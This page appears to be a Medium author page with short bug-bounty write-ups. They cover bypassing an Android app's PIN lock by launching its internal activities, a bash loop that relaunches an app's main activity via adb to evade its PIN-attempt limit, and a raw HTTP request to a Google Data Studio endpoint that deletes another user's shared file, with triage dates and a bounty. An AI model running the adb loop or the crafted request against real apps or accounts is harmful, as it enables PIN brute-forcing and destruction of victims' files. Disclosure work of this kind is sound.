Sign in

Hitting main activity multiple times app allowing to view any activity inside an app. without even entering the mobile pin.

Bug ;-

Application has a mobile pin security. without entering the pin you cant enter into the app.

Bypass :-

But by calling internal activities like settings.activity and notifications.activity with…


Application pin rate limiting bypass

The bug is in private program .

There is a feature to lock mobile app with pin . But only 3 attempts. If we attempt wrong pin. The app logouts.

But there is a misconfig in this feature. If you enter the pin 2 times. close the app and open the app again you will get another 3 attempts . So the rate limiting bypassed by closing and calling the main activity

You can launch the main activity as many times as you want with adb

while true;do adb shell am start -a android.intent.action.VIEW -n com.redacted/com.redacted.MainActivity;sleep 4;done

while the sleep time you can enter the pin 2 times and again the main activity will be called so you can enter pin again

Impact :- mobile auth pin rate limiting bypassed

No thanks for reading ..!


Description :

Attacker can able to delete any file with vulnerable endpoint ..!

Endpoint :

POST /u/4/deleteShareable?appVersion=20190926_020020 HTTP/1.1
Host: datastudio.google.com
Connection: close
Content-Length: 54
Sec-Fetch-Mode: cors
Origin: https://datastudio.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Content-Type: application/json
Accept: application/json, text/plain, */*
encoding: null
Sec-Fetch-Site: same-origin
Referer: https://datastudio.google.com/u/4/navigation/reporting

Cookie: RAP_XSRF_TOKEN=ACQ5uE-fZxoHyJIMJ6I9fWifDGZzjTeHCw:1569756166600; gh_7510439=;

{“id”:”9c491b49-a2f7–49fe-bd91-c4783657781",”type”:0}

vulnerable-paramerter : id

guessing id here not possible . But if the victim shared his file the id will be visible in url path

Triage Time

September 29,2019 : Reported

Oct 1, 2019 : Triaged

Oct 8, 2019 : bountry awarded 5k$

No thanks for reading the report :-

baluz

For more hidden tips visit https://balook.github.io

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store